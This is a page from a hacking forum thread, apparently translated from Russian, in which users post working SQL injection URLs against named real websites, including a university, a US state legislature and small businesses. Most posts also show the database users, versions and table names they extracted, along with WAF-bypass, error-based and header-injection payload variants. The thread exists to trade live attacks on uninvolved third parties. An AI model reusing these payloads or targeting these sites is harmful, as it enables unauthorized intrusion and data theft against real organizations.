SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Jerri

    Jerri Elder

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    other@localhost:5.0.45-log:sfors
     
  2. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    shop

    Code:
    http://riddim.de/new.php?id=-348+union+select+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where+table_name%3E0x7461626C655F343030--
    Code:
    http://riddim.de/new.php?id=-348+union+select+1,2,3,4,database%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18--
    database: riddim
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    5.0.92-community:wwwlej_ro@localhost:wwwlej_db4
     
    _________________________
    #13823 winstrool, 3 May 2011
    Last edited: 3 May 2011
  4. durito

    durito Elder

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    http://www.datefinder.co.nz/member/user_profile.asp?user_id=-185%20UnIon+selECt+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+

    5.0.27-community
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    PR: 1
    5.0.91-log:cenat_db:[email protected]
     
    _________________________
  6. totenkopf

    totenkopf Elder

    Joined:
    19 Jul 2010
    Messages:
    92
    Likes Received:
    64
    Reputations:
    19
    Code:
    http://www.tisc.co.uk/print.php?pid=-51+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
    tisc@localhost:5.0.77:tisc

    Code:
    http://felixonline.co.uk/print.php?article=-900+UNION+SELECT+concat_ws(0x3a,user(),version(),database())+--+
    media_felix@localhost:5.0.90-log:media_felix

    Code:
    http://www.lccc.co.uk/print.php?p=news&id=-3313+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),version(),database()),17,18,19,20,21,22,23,24,25,26,27,28+--+
    lccc-root@localhost:5.0.51b-log:lcccmain

    Code:
    http://www.inspire.org.uk/new/print.php?page=-135+UNION+ALL+SELECT+NULL,NULL,NULL,concat_ws(0x3a,user(),version(),database()),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+
    inspire_webuser@localhost:4.1.22-standard:inspire_webdbase

    Code:
    http://www.simplynetworking.es/advert_clicks.php?id=-416+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3b,0x3b,user(),version(),database()),8,9,10,11,12,13,14,15+--+
    simply@localhost;4.1.22;simply_networking

    Code:
    http://www.wilcocksassociates.co.uk/articles.php?id=-9258+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
    wilcock2_site@localhost:5.0.92-community:wilcock2_site
     
    1 person likes this.
  7. Cennarios

    Cennarios Elder

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.auhs.edu/mainpage.php?pageID=-13/**//*!union*//**//*!select*//**/user%28%29,2,3,4,5,6--+
     
    #13827 Cennarios, 4 May 2011
    Last edited: 18 Oct 2011
    2 people like this.
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    5.0.92-community:discount_commerce

    5.0.92-community:aaba_auct1@localhost:aaba_auct1

    // removed at the request of the working people ;)

    5.0.91-log:[email protected]:simpleas_cma
     
    _________________________
    #13828 winstrool, 4 May 2011
    Last edited: 5 May 2011
    1 person likes this.
  9. zlo12

    zlo12 Elder

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    www.clei.cl
    pr- 6

    http://www.clei.cl/cleiej/paper.php?id=32+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),Database(),User()),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+LIMIT+1,1--

    Database Version: 5.1.51-log
    Database name: clei
    User name: clei@localhost
     
    2 people like this.
  10. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    alphazone4.com :: PR - 3
    Exploit
    Code:
    http://www.alphazone4.com/m/store/US.php?cat=1+union+select+1,substring%28group_concat%28unhex%28hex%28table_name%29%29%29,250%29,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
    5.0.77
    admin@localhost
    alphazone4
     
    1 person likes this.
  11. [RedSky]

    [RedSky] Banned

    Joined:
    4 May 2011
    Messages:
    10
    Likes Received:
    11
    Reputations:
    10
    Situation: whitespace characters reach the query without URL decoding, and the query cannot be cut off with a single-line comment.
    Solution (replacing the whitespace character, output in the error, and closing the quote instead of cutting it off):
    Code:
    http://www.vw-axsel.ru/catalog/tiguan/'/**/and(1)IN(select/**/1/**/from(select/**/count(*),concat(version(),floor(rand(0)*2))from(information_schema.tables)group/**/by/**/2)a)and'
     
    #13831 [RedSky], 5 May 2011
    Last edited: 5 May 2011
    3 people like this.
  12. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    http://cakerysupplies.com/ : PR 4

    DB type: MS ACCESS
    DB name: cakery

    Exploit
    Apparently no printable columns turned up, and there was no point working it as a blind injection: as I understand it, the DB only serves to provide product information, so there are no passwords or users in it
     
    1 person likes this.
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    pr:5 tIC:350
    tIC:40
    infosfera@localhost:4.0.24_Debian-10sarge3-log:infosfera

    pr:5
    5.0.84:cagepris_user@localhost:cagepris_cms
     
    _________________________
    #13833 winstrool, 6 May 2011
    Last edited: 6 May 2011
    1 person likes this.
  14. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Arizona State Legislature

    http://www.az[ZZZ]leg.gov : PR 6

    DB type: Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    DB name: Status
    DB user name: webuser

    Exploit
    Tables
     
    #13834 eclipse, 6 May 2011
    Last edited: 6 May 2011
    3 people like this.
  15. [RedSky]

    [RedSky] Banned

    Joined:
    4 May 2011
    Messages:
    10
    Likes Received:
    11
    Reputations:
    10
    Situation: output via a double query
    Solution:
    Code:
    http://mindlessgaming.com/?page=match&action=view&match_id=1'and(0)union select " 1'and(0)union select 1,version(),3,4,5,user(),7,8,9,10,11,12,13,14-- -"-- -
     
    #13835 [RedSky], 7 May 2011
    Last edited: 7 May 2011
    4 people like this.
  16. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.soundtrackcovers.ru/catalogue.php?id=671-999.9+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
    4.1.25

    Code:
    http://www.finances-pedagogie.fr/pages/publications.php?id=34-999.9+union+select+1,2,version(),4,5,6--
    4.0.27-max-log
    Pr 5

    Code:
    http://www.lavallart-associes.com/texte_publications.php?id=49-999.9+union+select+1,2,3,4,5,6,7,version()--
    5.1.41-3ubuntu12

    Code:
    http://www.avance-org.fr/publications/publications.php?idFamille=2-999.9+union+select+1,2,3,4,5,6,version()--
    5.0.32-Debian_7etch12-log
     
    #13836 bloodAngel, 7 May 2011
    Last edited: 7 May 2011
    1 person likes this.
  17. Cennarios

    Cennarios Elder

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    It is noticeable that the site has gay-themed content....

    http://www.bayareareporter.org/news/article.php?sec=news&article=-5000+union+select+1,table_name,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7+from+information_schema.columns+where+column_name+like+%22%login%%22+limit+0,1--+
     
    2 people like this.
  18. [RedSky]

    [RedSky] Banned

    Joined:
    4 May 2011
    Messages:
    10
    Likes Received:
    11
    Reputations:
    10
    Situation: injection in the Referer header, in an INSERT query, output in the error.
    Solution:
    Code:
    http://74auc.ru/index.php
    referer: asd')on duplicate key update a=(select 1 from(select name_const(version(),1),name_const(version(),1))a)-- -
    
     
  19. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    http://faraon.stfaraon.ru/site.php?id=30065+and+1=0+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x666172616f6e7374666172616f6e--
     
  20. Megwarez

    Megwarez Member

    Joined:
    7 May 2010
    Messages:
    33
    Likes Received:
    12
    Reputations:
    4
    edu

    Code:
    http://art.colorado.edu/hiaff/section.php?id=-4+union+select+1,2,3,4,group_concat%280x0b,table_name%29,6,7+from+information_schema.tables+--
    pr6

    Code:
    http://www.adas-fusion.eu/theme.php?id=-3+union+select+1,2,3,group_concat%280x0b,table_name%29,5,6+from+information_schema.tables+--
    pr5
     
    #13840 Megwarez, 10 May 2011
    Last edited: 10 May 2011
    1 person likes this.